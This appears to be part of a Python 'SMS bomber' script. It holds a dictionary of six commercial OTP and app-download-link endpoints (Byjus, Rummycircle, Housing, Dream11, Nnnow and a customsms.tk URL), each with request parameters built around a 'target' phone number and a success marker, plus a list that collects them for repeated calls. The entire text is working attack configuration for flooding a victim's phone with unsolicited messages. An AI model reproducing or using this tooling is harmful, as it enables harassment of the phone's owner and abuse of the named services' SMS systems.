apidata = {

"Byjus":("https://mtnucleus.byjusweb.com/api/acs/v2/send-otp",{"phoneNumber":target,"page":"free-trial-classes"},{},"POST","""{"isOtpExhausted":false,"""),

"Rummycircle":(f"https://www.rummycircle.com/api/fl/auth/v3/getOtp",{"mobile":target,"deviceId":"d6be3862-7659-46c0-98b9-3d13328a243c","deviceName":"","refCode":"","isPlaycircle":"false"},{},"POST",'''success":true'''),

"Kisan":(f"https://www.customsms.tk/sms.php?num={target}&msg=SendByBaapGAttack",{},"GET",'''000'''),

"Housing":("https://login.housing.com/api/v2/send-otp",{"phone": f"{target}"},{},"POST","Sent"),

"Dream11":("https://api.dream11.com/sendsmslink",{"siteId": "1","mobileNum": f"{target}","appType": "androidfull"},{},"POST","true"),

"Nnow":("https://api.nnnow.com/d/api/appDownloadLink",{"mobileNumber": f"{target}"},{},"POST","true")




}



apis = [apidata["Byjus"],apidata["Rummycircle"],apidata["Kisan"],apidata["Housing"],apidata["Dream11"],apidata["Nnow"]]
